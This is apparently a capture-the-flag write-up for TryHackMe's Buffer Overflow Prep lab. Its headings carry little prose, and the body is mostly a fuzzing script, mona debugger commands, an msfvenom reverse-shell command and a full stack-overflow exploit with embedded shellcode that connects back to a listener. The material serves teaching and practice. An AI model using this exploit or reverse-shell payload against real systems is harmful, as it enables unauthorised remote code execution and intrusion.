What is Buffer Overflow? — TryHackMe: Buffer Overflow Prep Walkthrough

Introduction

Buffer Overflow Definition

What is Buffer Overflow?

What is a Buffer Overflow Attack?

xfreerdp /u:admin /p:password /cert:ignore /v:10.x.x.x /smart-sizing
nc 10.x.x.x 1337

Mona Configuration

!mona config -set workingfolder c:\mona\%p

Fuzzing

#!/usr/bin/env python3import socket, time, sysip = "10.x.x.x"port = 1337
timeout = 5
prefix = "OVERFLOW1 "
string = prefix + "A" * 100while True:
try:
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.settimeout(timeout)
s.connect((ip, port))
s.recv(1024)
print("Fuzzing with {} bytes".format(len(string) - len(prefix)))
s.send(bytes(string, "latin-1"))
s.recv(1024)
except:
print("Fuzzing crashed at {} bytes".format(len(string) - len(prefix)))
sys.exit(0)
string += 100 * "A"
time.sleep(1)

Crash Replication & Controlling EIP

#!/usr/bin/env python3
import socket
ip = "10.10.2.120"
port = 1337
prefix = "OVERFLOW1 "
offset = 0
overflow = "A" * offset
retn = ""
padding = ""
payload = ""
postfix = ""
buffer = prefix + overflow + retn + padding + payload + postfix
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect((ip, port))
print("Sending evil buffer...")
s.send(bytes(buffer + "\r\n", "latin-1"))
print("Done!")
except: print("Could not connect.")
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 2400
python3 exploit.py
!mona findmsp -distance 2400
EIP contains normal pattern : ... (offset 1978)

Finding Bad Characters

!mona bytearray -b "\x00"
#!/usr/bin/env python3for x in range(1, 256):
print("\\x" + "{:02x}".format(x), end='')

print()
!mona compare -f C:\mona\oscp\bytearray.bin -a 0188FA30

Finding a Jump Point

!mona jmp -r esp -cpb "\x00\x07\x08\x2e\x2f\xa0\xa1"

Generating Payload

msfvenom -p windows/shell_reverse_tcp LHOST=10.x.x.x LPORT=443 EXITFUNC=thread -b "\x00\x07\x08\x2e\x2f\xa0\xa1" -f c

Prepending NOPs

#!/usr/bin/env python3
import socket
ip = "10.x.x.x"
port = 1337
prefix = "OVERFLOW1 "
offset = 1978
overflow = "A" * offset
retn = "\xaf\x11\x50\x62"
padding = "\x90" * 16
payload = ("\x2b\xc9\x83\xe9\xaf\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e"
"\xac\x9e\x69\x95\x83\xee\xfc\xe2\xf4\x50\x76\xeb\x95\xac\x9e"
"\x09\x1c\x49\xaf\xa9\xf1\x27\xce\x59\x1e\xfe\x92\xe2\xc7\xb8"
"\x15\x1b\xbd\xa3\x29\x23\xb3\x9d\x61\xc5\xa9\xcd\xe2\x6b\xb9"
"\x8c\x5f\xa6\x98\xad\x59\x8b\x67\xfe\xc9\xe2\xc7\xbc\x15\x23"
"\xa9\x27\xd2\x78\xed\x4f\xd6\x68\x44\xfd\x15\x30\xb5\xad\x4d"
"\xe2\xdc\xb4\x7d\x53\xdc\x27\xaa\xe2\x94\x7a\xaf\x96\x39\x6d"
"\x51\x64\x94\x6b\xa6\x89\xe0\x5a\x9d\x14\x6d\x97\xe3\x4d\xe0"
"\x48\xc6\xe2\xcd\x88\x9f\xba\xf3\x27\x92\x22\x1e\xf4\x82\x68"
"\x46\x27\x9a\xe2\x94\x7c\x17\x2d\xb1\x88\xc5\x32\xf4\xf5\xc4"
"\x38\x6a\x4c\xc1\x36\xcf\x27\x8c\x82\x18\xf1\xf6\x5a\xa7\xac"
"\x9e\x01\xe2\xdf\xac\x36\xc1\xc4\xd2\x1e\xb3\xab\x61\xbc\x2d"
"\x3c\x9f\x69\x95\x85\x5a\x3d\xc5\xc4\xb7\xe9\xfe\xac\x61\xbc"
"\xc5\xfc\xce\x39\xd5\xfc\xde\x39\xfd\x46\x91\xb6\x75\x53\x4b"
"\xfe\xff\xa9\xf6\x63\x91\xbf\xa8\x01\x97\xac\x9f\xd2\x1c\x4a"
"\xf4\x79\xc3\xfb\xf6\xf0\x30\xd8\xff\x96\x40\x29\x5e\x1d\x99"
"\x53\xd0\x61\xe0\x40\xf6\x99\x20\x0e\xc8\x96\x40\xc4\xfd\x04"
"\xf1\xac\x17\x8a\xc2\xfb\xc9\x58\x63\xc6\x8c\x30\xc3\x4e\x63"
"\x0f\x52\xe8\xba\x55\x94\xad\x13\x2d\xb1\xbc\x58\x69\xd1\xf8"
"\xce\x3f\xc3\xfa\xd8\x3f\xdb\xfa\xc8\x3a\xc3\xc4\xe7\xa5\xaa"
"\x2a\x61\xbc\x1c\x4c\xd0\x3f\xd3\x53\xae\x01\x9d\x2b\x83\x09"
"\x6a\x79\x25\x89\x88\x86\x94\x01\x33\x39\x23\xf4\x6a\x79\xa2"
"\x6f\xe9\xa6\x1e\x92\x75\xd9\x9b\xd2\xd2\xbf\xec\x06\xff\xac"
"\xcd\x96\x40")
postfix = ""
buffer = prefix + overflow + retn + padding + payload + postfix
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect((ip, port))
print("Sending evil buffer...")
s.send(bytes(buffer + "\r\n", "latin-1"))
print("Done!")
except:
print("Could not connect.")

Exploit

References

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store